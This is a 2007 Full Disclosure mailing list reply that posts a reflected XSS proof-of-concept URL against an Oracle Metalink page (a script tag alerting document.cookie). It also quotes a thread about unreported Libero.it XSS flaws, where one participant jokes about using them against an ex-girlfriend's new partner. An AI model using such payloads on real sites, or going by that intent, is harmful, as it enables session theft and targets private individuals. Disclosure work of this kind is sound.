Full Disclosure mailing list archives

Re: Another XSS vulnerability in Italian providerLibero.it


From: "MailLists Listas" <seclistas () gmail com>
Date: Thu, 29 Mar 2007 22:56:05 -0300

https://metalink.oracle.com/metalink/plsql/f?p=200:101:1834058191406040565&notification_msg=<script>alert(document.cookie)</script>

On 3/29/07, Edmond Dantes <jk3380 () naida org> wrote:
paura () autistici org wrote:
They probably need to redo their entire site's scripts, I wouldn't doubt
there's a few more exploits in there somewhere. -- 2+ exploits within one

site in one month is pretty sad.

Hemmm...
The same guys relased another 4 just a few minutes ago.

The idiot part is that Libero strongly refuse to contact the guys even if they continue to say that they have other 
XSSs and want to contact the admins...
They told libero : 'we have other vulns, will you tell us who can cope with them' but received no answers... :)

Sort of sad...

Maybe not... at least for me ;-))
Expose more. My ex girl friend met her new guy there. Maybe I can pull some
tricks ;-)

/CapitanMutanda

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Current thread: